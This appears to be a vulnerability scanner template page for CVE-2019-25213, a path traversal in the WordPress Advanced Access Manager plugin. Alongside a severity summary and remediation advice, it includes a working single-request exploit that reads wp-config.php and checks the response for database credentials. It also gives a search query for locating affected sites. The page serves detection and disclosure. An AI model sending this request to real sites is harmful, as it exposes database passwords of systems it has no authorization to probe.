WordPress Advanced Access Manager - Path Traversal
CVE-2019-25213
Early Release
Description
The Advanced Access Manager plugin for WordPress is vulnerable to Unauthenticated Arbitrary File Read in versions up to, and including, 5.9.8.1 due to insufficient validation on the aam-media parameter. This allows unauthenticated attackers to read any file on the server, including sensitive files such as wp-config.php
Severity
Critical
CVSS Score
9.8
Published Date
November 29, 2025
Template Author
riteshs4hu
CVE-2019-25213.yaml
id: CVE-2019-25213
info:
name: WordPress Advanced Access Manager - Path Traversal
author: riteshs4hu
severity: critical
description: |
The Advanced Access Manager plugin for WordPress is vulnerable to Unauthenticated Arbitrary File Read in versions up to, and including, 5.9.8.1 due to insufficient validation on the aam-media parameter. This allows unauthenticated attackers to read any file on the server, including sensitive files such as wp-config.php
impact: |
Unauthenticated attackers can read sensitive files like wp-config.php, leading to information disclosure and potential further exploitation.
remediation: |
Update to the latest version of the plugin that addresses this vulnerability.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/id/55e0f0df-7be2-4e18-988c-2cc558768eff?source=cve
- https://nvd.nist.gov/vuln/detail/CVE-2019-25213
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-25213
cwe-id: CWE-264
metadata:
verified: true
max-request: 1
publicwww-query: "wp-content/plugins/advanced-access-manager"
tags: cve,cve2019,wordpress,wp-plugin,wp,advanced_access_manager,lfi
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=aam-media-load&aam-media=/wp-config.php"
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains_all(body, 'DB_NAME','DB_USER','DB_PASSWORD')"
condition: and
# digest: 4b0a00483046022100eb74258de3f5fb8578c5524e0337dc78eed91e6ad227361e57245d988bd4964b022100c2a4a72ad77cb694bd46814ef1751e05edf940dbe5ff1d300c64cf3e4d344b40:922c64590222798bb761d5b6d8e729509.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2019-25213
CWE ID:
cwe-264
Remediation Steps
Update to the latest version of the plugin that addresses this vulnerability.